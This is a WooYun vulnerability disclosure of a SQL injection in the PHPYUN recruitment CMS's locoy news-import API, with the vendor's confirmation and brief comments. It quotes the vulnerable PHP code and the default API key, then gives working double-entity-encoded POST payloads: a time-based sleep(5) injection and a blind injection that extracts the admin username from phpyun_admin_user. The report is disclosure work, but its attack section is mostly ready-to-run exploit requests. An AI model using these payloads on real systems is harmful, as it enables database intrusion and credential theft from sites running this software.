当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(33) 关注此漏洞

缺陷编号: WooYun-2015-127257

漏洞标题: PHPYUN无视GPC(可注入全站信息)

相关厂商: php云人才系统

漏洞作者: menmen519

提交时间: 2015-07-20 10:59

公开时间: 2015-10-21 21:18

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核

6人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-07-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

PHPYUN无视GPC(可注入全站信息) 180个字符的注入,等于没有限制,什么都能注入出来

详细说明:

首先我们看这个文件:

api/locoy/model/news.class.php:



code 区域
class news_controller extends common{


	function addnews_action(){//新闻添加


		include("locoy_config.php");


		if($locoyinfo['locoy_online']!=1){


			echo 4;die;


		}


		if($locoyinfo['locoy_key']!=trim($_GET['key'])){


			echo 5;die;


		}


        if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){


			echo 2;die;


		}


		$row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'");


		if(is_array($row)){


			echo 3;die;


		}


		$content=$_POST['content'];


		


		$value="";


        $value.="`title`='".trim($_POST['title'])."',";


		$value.="`nid`='".$_POST['nid']."',";


		$value.="`did`='0',";


		$value.="`author`='".$_POST['author']."',";


		$description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk");


		$description=$_POST['description']?$_POST['description']:$description;


		$description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);


		$value.="`description`='".$description."',";


		$value.="`source`='".$_POST['source']."'";


		if($_POST['ctime']){


			$value.=",`datetime`='".strtotime($_POST['ctime'])."'";


		}else{


			$value.=",`datetime`='".time()."'";


		}


		if($_POST['hits']){


			$value.=",`hits`='".trim($_POST['hits'])."'";


		}else{


			$row=explode('-',$locoyinfo['locoy_rand']);


			if(is_array($row)){


				$rand=rand(trim($row[0]),trim($row[1]));


			}else{


				$rand=!trim($row)?0:$row;


			}


			$value.=",`hits`='".$rand."'";


		}


		if($_POST['sort']){


			$value.=",`sort`='".trim($_POST['sort'])."'";


		}else{


			$row=explode('-',$locoyinfo['locoy_sort']);


			if(is_array($row)){


				$rand=rand(trim($row[0]),trim($row[1]));


			}else{


				$rand=!trim($row)?0:$row;


			}


			$value.=",`sort`='".$rand."'";


		}


		if($_POST['newsphoto']){


			$value.=",`newsphoto`='".trim($_POST['newsphoto'])."'";


		}


		if($_POST['s_thumb']){


			$value.=",`s_thumb`='".trim($_POST['s_thumb'])."'";


		}


       if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){


			require(LIB_PATH."lib_splitword_class.php");


			$sp = new SplitWord();


			$keywordarr=$sp->getkeyword(strip_tags(html_entity_decode($content)));


			$value.=",`keyword`='".strip_tags(@implode(",",$keywordarr))."'";


		}elseif($_POST['keyword']){


			$value.=",`keyword`='".str_replace(",",",",$_POST['keyword'])."'";


		}


     	$new_base = $this->obj->DB_insert_once("news_base",$value);









这个里面有几个条件要说明一下:





1.$locoyinfo['locoy_key']!=trim($_GET['key'])



我们搜索一下:

locoy_config.php里面 默认安装的话,就是

$locoyinfo=array("locoy_online"=>"1","locoy_name"=>"yun_","locoy_pwd"=>"12345678","locoy_key"=>"phpyun","co







找来找去都没有发现设置更改这个配置的地方,在后台的添加新闻的地方也没有找到,不管这个配置是硬编码的还是怎么样,反正是默认配置





条件2:



$row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'");

if(is_array($row)){

echo 3;die;

}





这个语句必须查不到,也就是说数据库里面不存在这个新闻



条件3 if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){ 这个逻辑不要进来,不然就会报错









然后我们看看问题点:



code 区域
$description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk");


		$description=$_POST['description']?$_POST['description']:$description;


		$description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);









发现了没有我们只要对数据进行实体编码即可



所有的空格都会被去掉,那么我们比如sleep(5)可以写成slee p(5)





解码后有180个字符的范围,那么我们就可以什么都能注射出来







url:



http://localhost/phpyun40/upload/api/locoy/index.php?m=news&c=addnews&key=phpyun





postdata:



title=xxxx&content=1'*slee p(5)#&nid=567&keyword=xxxxxx







编码一层:



title=xxxx&content=1'*slee p(5)#&nid=567&keyword=xxxxxx





再编码一层:



title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx







这样发送url:

http://localhost/phpyun40/upload/api/locoy/index.php?m=news&c=addnews&key=phpyun





postdata:



title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx





后台抓取sql为:



INSERT INTO `phpyun_news_base` SET `title`='xxxx',`nid`='567',`did`='0',`author`='',`description`='1'*sleep(5)#',`source`='',`datetime`='1437052963',`hits`='',`sort`='',`keyword`='xxxxxx'





1.png









后续进行猜测的,180个字符随便来,记得里面的nid每次请求一次都要变一次





在所有的关键字里面都加一个空格



postdata:

title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23105%3B%26%2332%3B%26%23102%3B%26%2340%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23105%3B%26%23105%3B%26%2340%3B%26%23115%3B%26%23117%3B%26%2398%3B%26%23115%3B%26%23116%3B%26%23114%3B%26%2340%3B%26%2340%3B%26%23115%3B%26%23101%3B%26%23108%3B%26%23101%3B%26%2332%3B%26%2399%3B%26%23116%3B%26%2396%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%23110%3B%26%2397%3B%26%23109%3B%26%23101%3B%26%2396%3B%26%23102%3B%26%23114%3B%26%2332%3B%26%23111%3B%26%23109%3B%26%2396%3B%26%23112%3B%26%23104%3B%26%23112%3B%26%23121%3B%26%23117%3B%26%23110%3B%26%2395%3B%26%2397%3B%26%23100%3B%26%23109%3B%26%23105%3B%26%23110%3B%26%2395%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%2396%3B%26%2341%3B%26%2344%3B%26%2349%3B%26%2344%3B%26%2349%3B%26%2341%3B%26%2341%3B%26%2361%3B%26%2357%3B%26%2355%3B%26%2344%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2344%3B%26%2349%3B%26%2341%3B%26%2335%3B&nid=5671&keyword=xxxxxx







抓取sql为:

INSERT INTO `phpyun_news_base` SET `title`='xxxx',`nid`='5671',`did`='0',`author`='',`description`='1'*if(ascii(substr((select`username`from`phpyun_admin_user`),1,1))=97,sleep(5),1)#',`source`='',`datetime`='1437053421',`hits`='',`sort`='',`keyword`='xxxxxx'









漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-23 21:17

厂商回复:

感谢提供,我们会尽快修复!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-07-20 11:00 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)
    0

    为啥没提醒

    1# 回复此人
  2. 2015-07-20 11:12 | Ton7BrEak ( 普通白帽子 | Rank:292 漏洞数:62 | 我要继续努力!)
    0

    mark

    2# 回复此人
  3. 2015-07-23 23:01 | 从容 ( 普通白帽子 | Rank:359 漏洞数:94 | Enjoy Hacking Just Because It's Fun | ...)
    0

    为啥说开源更安全?因为乌云。。。

    3# 回复此人

登录后才能发表评论,请先 登录